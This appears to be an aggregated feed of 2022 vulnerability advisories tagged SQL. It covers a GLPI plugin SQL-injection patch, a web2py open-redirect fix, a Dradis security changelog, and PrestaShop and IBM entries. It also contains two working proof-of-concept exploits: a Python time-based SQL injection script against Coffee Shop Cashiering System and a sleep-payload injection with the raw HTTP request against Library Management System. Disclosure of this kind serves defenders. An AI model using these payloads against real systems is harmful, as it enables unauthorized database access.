GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. glpi-inventory-plugin is a plugin for GLPI to handle inventory management. In affected versions a SQL injection can be made using package deployment tasks. This issue has been resolved in version 1.0.2. Users are advised to upgrade. Users unable to upgrade should delete the `front/deploypackage.public.php` file if they are not using the `deploy tasks` feature.

@@ -35,6 +35,8 @@

die("Sorry. You can't access directly to this file");

}

  

use Glpi\\Toolbox\\Sanitizer;

  

/\*\*

\* Manage the deploy packages.

\*/

@@ -1889,11 +1891,11 @@ public function deployToComputer($computers\_id, $packages\_id, $users\_id)

  

//Add the new task

$input = \[

'name' => '\[deploy on demand\] ' . $this\->fields\['name'\],

'entities\_id' => $computer\->fields\['entities\_id'\],

'reprepare\_if\_successful' => 0,

'is\_deploy\_on\_demand' => 1,

'is\_active' => 1,

'name' => '\[deploy on demand\] ' . Sanitizer::dbEscape($this\->fields\['name'\]),

'entities\_id' => $computer\->fields\['entities\_id'\],

'reprepare\_if\_successful' => 0,

'is\_deploy\_on\_demand' => 1,

'is\_active' => 1,

\];

$tasks\_id = $pfTask\->add($input);

CVE-2022-31082: Merge pull request from GHSA-q6m7-h6rj-5wmw · glpi-project/glpi-inventory-plugin@0b805ca

Coffee Shop Cashiering System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection# Date: 27-06-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description # The id parameter does not perform input validation on the view_detail.php file it allow authenticated Time Based SQL Injection.import requestsimport syss = requests.session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login_sql():    target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1]    d = {        "username" : "admin",        "password" : "admin123"    }    r = s.post(target, data=d, allow_redirects=True, proxies=proxies)    res = r.text    if "success" in res:        return True    else:        return Falsedef detect_sql():    r = s.get("http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1])    res = r.text    if "You have an error in your SQL syntax;" in res:        print("[+] SQL Error Found !!")    else:        return Falsedef time_based_sql():    target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(5)--+-" % sys.argv[1]    r = s.get(target, proxies=proxies)    print("[+] Time Based SQL Injection Executed !!!")def main():    if len(sys.argv) !=2:        print("(+) usage: %s <target>" % sys.argv[0] )        print("(+) eg: %s 192.168.121.103 " % sys.argv[0] )        sys.exit(-1)    if login_sql():        print("[+] Success Login")    detect_sql()    time_based_sql()if __name__ == "__main__":    main()

Coffee Shop Cashiering System 1.0 SQL Injection

Library Management System with QR Code version 1.0 suffers from a remote SQL injection vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 SQLInjection#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md#### Description：##### The reason for the SQL injection vulnerability is that the websiteapplication does not verify the validity of the data submitted by the userto the server (type, length, business parameter validity, etc.), and doesnot effectively filter the data input by the user with special characters ,so that the user's input is directly brought into the database forexecution, which exceeds the expected result of the original design of theSQL statement, resulting in a SQL injection vulnerability.LibraryManagement System with QR code Attendance does not filter the contentcorrectly at the "bookdetails.php" id parameter, resulting in thegeneration of SQL injection.#### Payload used:`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`#### POC1.  Login into the CMS.Admin Default Access:Username: adminPassword: admin2. http://localhost/LMS/librarian/bookdetails.php?id=1913. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)--PbtB`)4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`5. code```GET/LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtBHTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close```

Library Management System With QR Code 1.0 SQL Injection

A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance 1.0 SQL Injection****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md****Description：****The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails" id parameter, resulting in the generation of SQL injection.****Payload used:**

' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB

**POC**

1.  Login into the CMS. Admin Default Access:

Username: admin

Password: admin

2.  http://localhost/LMS/librarian/bookdetails.php?id=191
    
3.  Put sleep(5) payload (' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB)
    
4.  http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB
    
5.  code
    

    GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    

**line 111 of bookdetails.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands**

CVE-2022-2214: CVE/POC.md at main · CyberThoth/CVE

Open redirect vulnerability in web2py versions prior to 2.22.5 allows a remote attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.

@@ -0,0 +1,228 @@ from gluon.dal import DAL from gluon.storage import Storage from gluon.utils import web2py\_uuid try: \# web3py from gluon.current import current from gluon.url import URL from gluon.helpers import \* except: \# web2py from gluon import current from gluon.html import \*  
  
  
def FormStyleDefault(table, vars, errors, readonly, deletable):  
form \= FORM(TABLE(),\_method\='POST',\_action\='#',\_enctype\='multipart/form-data') for field in table:  
input\_id \= '%s\_%s' % (field.tablename, field.name) value \= field.formatter(vars.get(field.name)) error \= errors.get(field.name) field\_class \= field.type.split()\[0\].replace(':','-')  
if field.type \== 'blob': \# never display blobs (mistake?) continue elif readonly or field.type\=='id': if not field.readable: continue else: control \= field.represent and field.represent(value) or value or '' elif not field.writable: continue elif field.widget: control \= field.widget(table, value) elif field.type \== 'text': control \= TEXTAREA(value or '', \_id\=input\_id,\_name\=field.name) elif field.type \== 'boolean': control \= INPUT(\_type\='checkbox', \_id\=input\_id, \_name\=field.name, \_value\='ON', \_checked \= value) elif field.type \== 'upload': control \= DIV(INPUT(\_type\='file', \_id\=input\_id, \_name\=field.name)) if value: control.append(A('download', \_href\=URL('default','download',args\=value))) control.append(INPUT(\_type\='checkbox',\_value\='ON', \_name\='\_delete\_'+field.name)) control.append('(check to remove)') elif hasattr(field.requires, 'options'): multiple \= field.type.startswith('list:') value \= value if isinstance(value, list) else \[value\] options \= \[OPTION(v,\_value\=k,\_selected\=(k in value)) for k,v in field.requires.options()\] control \= SELECT(\*options, \_id\=input\_id, \_name\=field.name, \_multiple\=multiple) else: field\_type \= 'password' if field.type \== 'password' else 'text' control \= INPUT(\_type\=field\_type, \_id\=input\_id, \_name\=field.name, \_value\=value, \_class\=field\_class)  
form\[0\].append(TR(TD(LABEL(field.label,\_for\=input\_id)), TD(control,DIV(error,\_class\='error') if error else ''), TD(field.comment or '')))  
td \= TD(INPUT(\_type\='submit',\_value\='Submit')) if deletable: td.append(INPUT(\_type\='checkbox',\_value\='ON',\_name\='\_delete')) td.append('(check to delete)') form\[0\].append(TR(TD(),td,TD())) return form  
\# ################################################################ \# Form object (replaced SQLFORM) \# ################################################################  
class Form(object): """ Usage in web2py controller: def index(): form = Form(db.thing, record=1) if form.accepted: ... elif form.errors: ... else: ... return dict(form=form) Arguments: \- table: a DAL table or a list of fields (equivalent to old SQLFORM.factory) \- record: a DAL record or record id \- readonly: set to True to make a readonly form \- deletable: set to False to disallow deletion of record \- formstyle: a function that renders the form using helpers (FormStyleDefault) \- dbio: set to False to prevent any DB write \- keepvalues: (NOT IMPLEMENTED) \- formname: the optional name of this form \- csrf: set to False to disable CRSF protection """  
def \_\_init\_\_(self, table, record\=None, readonly\=False, deletable\=True, formstyle\=FormStyleDefault, dbio\=True, keepvalues\=False, formname\=False, hidden\=None, csrf\=True):  
if isinstance(table, list): dbio \= False \# mimic a table from a list of fields without calling define\_table formname \= formname or 'none' for field in table: field.tablename \= getattr(field,'tablename',formname)  
if isinstance(record, (int, long, basestring)): record\_id \= int(str(record)) self.record \= table\[record\_id\] else: self.record \= record  
self.table \= table self.readonly \= readonly self.deletable \= deletable and not readonly and self.record self.formstyle \= formstyle self.dbio \= dbio self.keepvalues \= True if keepvalues or self.record else False self.csrf \= csrf self.vars \= Storage() self.errors \= Storage() self.submitted \= False self.deleted \= False self.accepted \= False self.cached\_helper \= False self.formname \= formname or table.\_tablename self.hidden \= hidden self.formkey \= None  
request \= current.request  
if readonly or request.method\=='GET': if self.record: self.vars \= self.record else: post\_vars \= request.post\_vars print post\_vars self.submitted \= True \# check for CSRF if csrf and self.formname in (current.session.\_formkeys or {}): self.formkey \= current.session.\_formkeys\[self.formname\] \# validate fields if not csrf or post\_vars.\_formkey \== self.formkey: if not post\_vars.\_delete: for field in self.table: if field.writable: value \= post\_vars.get(field.name) \# FIX THIS deal with set\_self\_id before validate (value, error) \= field.validate(value) if field.type \== 'upload': delete \= post\_vars.get('\_delete\_'+field.name) if value is not None and hasattr(value,'file'): value \= field.store(value.file, value.filename, field.uploadfolder) elif self.record and not delete: value \= self.record.get(field.name) else: value \= None self.vars\[field.name\] \= value if error: self.errors\[field.name\] \= error if self.record: self.vars.id \= self.record.id if not self.errors: self.accepted \= True if dbio: self.update\_or\_insert() elif dbio: self.deleted \= True self.record.delete\_record() \# store key for future CSRF if csrf: session \= current.session if not session.\_formkeys: session.\_formkeys \= {} if self.formname not in current.session.\_formkeys: session.\_formkeys\[self.formname\] \= web2py\_uuid() self.formkey \= session.\_formkeys\[self.formname\]  
def update\_or\_insert(self): if self.record: self.record.update\_record(\*\*self.vars) else: \# warning, should we really insert if record self.vars.id \= self.table.insert(\*\*self.vars)  
def clear(): self.vars.clear() self.errors.clear() for field in self.table: self.vars\[field.name\] \= field.default  
def helper(self): if not self.cached\_helper: cached\_helper \= self.formstyle(self.table, self.vars, self.errors, self.readonly, self.deletable) if self.csrf: cached\_helper.append(INPUT(\_type\='hidden',\_name\='\_formkey', \_value\=self.formkey)) for key in self.hidden or {}: cached\_helper.append(INPUT(\_type\='hidden',\_name\=key, \_value\=self.hidden\[key\])) self.cached\_helper \= cached\_helper return cached\_helper  
def xml(self): return self.helper().xml()  
def \_\_unicode\_\_(self): return self.xml()  
def \_\_str\_\_(self): return self.xml().encode('utf8')

CVE-2022-33146: improved open redirect prevention · web2py/web2py@d980560

### Impact
An authenticated customer can perform SQL injection

### Patches
Issue is fixed in 2.1.1


**SQL Injection in BlockWishList**

High severity GitHub Reviewed Published Jun 25, 2022 in PrestaShop/blockwishlist • Updated Jun 25, 2022

GHSA-2jx3-5j9v-prpp: SQL Injection in BlockWishList

RG-EG series gateway EG350 EG_RGOS 11.1(6) was discovered to contain a SQL injection vulnerability via the function get_alarmAction at /alarm_pi/alarmService.php.

CVE-2022-33128

Dradis Professional Edition before 4.3.0 allows attackers to change an account password via reusing a password reset token.

This page lists all security vulnerabilities fixed in released versions of **Dradis**. Each vulnerability is given a security impact rating by the Dradis core team - please note that this rating may vary from platform to platform. We also list the versions of **Dradis** the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please send comments or corrections for these vulnerabilities to: **security\[ {at} \]dradisframework{ \[dot\] }org**

**Fixed in Dradis 4.3.0****Low: Password reset token can be reused in a 5-minute window**

The password reset token can be reused in a 5-minute window.

Affects: Pro: 4.2.0 and possibly older versions of Dradis.

Credit: Goktug Serez

**Fixed in Dradis 4.2.0****low: Authenticated author broken access control: read access to screenshots**

An author can access screenshots from another project.

Affects: CE: 4.1.0, Pro: 4.1.2 and possibly older versions of Dradis.

**Fixed in Dradis 4.1.2****high: Authenticated (author) path traversal vulnerability**

An author can gain authorized access.

Affects: CE: 4.1.0, Pro: 4.1.1 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.1.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.0.0, Pro: 4.0.0 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.0.0****medium: Authenticated (contributor) information disclosure**

After a contributor had been assigned Gateway access to a project by an admin user they may retain access to the project after the projects team has been changed.

Affects: Pro: 3.12.2 and possibly older versions of Dradis when using the Gateway addon.

**Fixed in Dradis 3.11****medium: Authenticated (admin) persistent cross-site scripting**

Insufficient validation around custom fields resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

Credit: Michelle Flanagan

**Fixed in Dradis 3.10.1****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.9.1****high: Authenticated (author) information disclosure**

An author who is disabled by admins may continue to use the API.

Affects: Pro: 3.5.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.7.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Comment textareas input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

**low: Authenticated (admin) persistent cross-site scripting**

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.6.0****high: Authenticated (author) information disclosure**

An author with an active session who is disabled by admins may continue to operate within the application

Affects: Pro 3.5.1 and possibly older versions of Dradis.

**medium: Authenticated (admin) data modification**

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

**Fixed in Dradis 3.5.0****high: Authenticated (author) information disclosure**

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette

**medium: Authenticated (author) information disclosure**

Mentioning a user in a comment, which does not have access to the project, could result in disclosure of content from future comments in the same thread.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.4.1****high: Authenticated (author) path traversal vulnerability**

Uploading a malicious zip file it is possible to place files in undesired locations on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.

**medium: Authenticated (author) information disclosure**

Information from other projects could be disclosed to other users in the system that happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

**low: Authenticated (admin) SQL Injection**

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.4 to 3.2.

**Fixed in Dradis 3.2.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**medium: Authenticated persistent cross-site scripting**

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**Fixed in Dradis 3.11.1****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

**Fixed in Dradis 3.10.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

**Fixed in Dradis 3.6.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.X and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

**Fixed in Dradis 3.1.0.rc2****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda

**Fixed in Dradis 2.5.2****high: Unauthenticated reflected cross-site scripting**

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet

**Fixed in Dradis 2.0.1****high: Missing authentication**

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598

Affects: 2.0.0

CVE-2009-0670 (candidate)

CVE-2022-30028: Security Reports | Dradis Framework

IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may terminate abnormally when executing specially crafted SQL statements by an authenticated user. IBM X-Force ID: 2219740.

CVE-2022-22389: IBM Db2 denial of service CVE-2022-22389 Vulnerability Report

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

Tag

#sql